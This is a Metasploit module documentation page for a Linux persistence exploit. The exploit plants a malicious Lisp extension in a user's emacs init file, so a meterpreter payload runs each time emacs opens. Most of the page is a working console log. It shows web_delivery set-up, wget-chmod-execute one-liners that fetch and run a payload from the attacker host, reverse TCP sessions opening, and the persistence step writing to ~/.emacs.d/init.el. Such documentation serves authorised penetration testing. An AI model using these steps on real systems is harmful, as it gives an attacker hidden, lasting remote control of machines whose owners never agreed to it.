adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d2ed326b16ff5dc8f95633e287c19eb467c5ac6c
metasploit-gs/documentation/modules/exploit/linux/persistence/emacs_extension.md
T
h00die 75ff7b6af1 emacs extension persistence
2026-01-31 22:54:18 -05:00

119 lines
4.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module adds a lisp based malicious extension to the emacs configuration file.
When emacs is opened, the extension will be loaded and the payload will be executed.
Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.
## Verification Steps
Example steps in this format (is also in the PR):
1. Install emacs
2. Start msfconsole
3. Get a shell
4. Do: `use exploit/linux/persistence/emacs_extension`
5. Do: `set session #`
6. Do: `run`
7. You should get a shell when `emacs` is started.
## Options
### NAME
Name of the extension. Defaults to random
### CONFIG_FILE
Config file location on target. Defaults to `~/init.el`
## Scenarios
### emacs 29.3 build 1 on Ubuntu Desktop 24.04.
Initial Shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO AD6apRwS --no-check-certificate http://1.1.1.1:8082/l; chmod +x AD6apRwS; ./AD6apRwS& disown
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:42830) at 2026-01-31 22:48:46 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ubuntu-desktop-2404
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ubuntu
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/emacs_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/emacs_extension) > set session 1
session => 1
msf exploit(linux/persistence/emacs_extension) > set FETCH_COMMAND wget
FETCH_COMMAND => wget
msf exploit(linux/persistence/emacs_extension) > exploit
[*] Command to run on remote host: wget -qO ./CdYxekmN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./CdYxekmN;./CdYxekmN&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(linux/persistence/emacs_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. emacs is installed
[*] Using plugin name: FFuvdiIc
[*] /home/ubuntu/.emacs.d/init.el does not exist, creating it
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu-desktop-2404_20260131.5137/ubuntu-desktop-2404_20260131.5137.rc
```
Launch `emacs`
```
msf exploit(linux/persistence/emacs_extension) >
[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 2.2.2.2 (Wget/1.21.4)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42262) at 2026-01-31 22:51:43 -0500
```
Reference in New Issue View Git Blame Copy Permalink